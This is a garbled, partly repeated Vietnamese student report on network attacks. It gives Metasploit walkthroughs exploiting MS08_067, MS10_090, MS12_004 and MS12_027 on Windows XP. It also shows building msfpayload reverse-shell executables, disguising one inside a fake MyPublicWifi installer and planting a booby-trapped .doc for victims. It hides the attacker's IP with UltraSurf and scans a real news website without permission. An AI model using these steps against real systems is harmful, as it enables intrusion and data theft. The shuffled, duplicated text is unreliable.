Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
